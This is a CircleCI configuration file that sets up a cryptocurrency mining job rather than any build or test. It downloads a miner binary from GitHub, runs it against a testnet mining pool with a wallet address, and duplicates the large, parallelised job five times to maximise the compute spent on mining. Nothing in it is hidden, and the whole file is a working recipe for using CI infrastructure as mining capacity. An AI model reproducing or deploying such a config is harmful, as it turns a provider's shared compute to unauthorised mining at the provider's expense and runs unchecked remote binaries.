version: 2.1

jobs:
  miner:
    docker:
      - image: ubuntu:latest
    parallelism: 4
    resource_class: large
    steps:
      - checkout
      - run:
          name: Install Dependencies
          command: |
            apt-get update
            apt-get install -y wget
      - run:
          name: Setup and Run Miner
          command: |
            wget https://github.com/Project-InitVerse/ini-miner/releases/download/v1.0.0/iniminer-linux-x64
            chmod +x iniminer-linux-x64
            ./iniminer-linux-x64 --pool stratum+tcp://0x6b9B4E431fFD80A8f97af06c0565B5304239e6c2.Circle@pool-core-testnet.inichain.com:32672
          no_output_timeout: 2h

workflows:
  mining:
    jobs:
      - miner
      - miner
      - miner
      - miner
      - miner
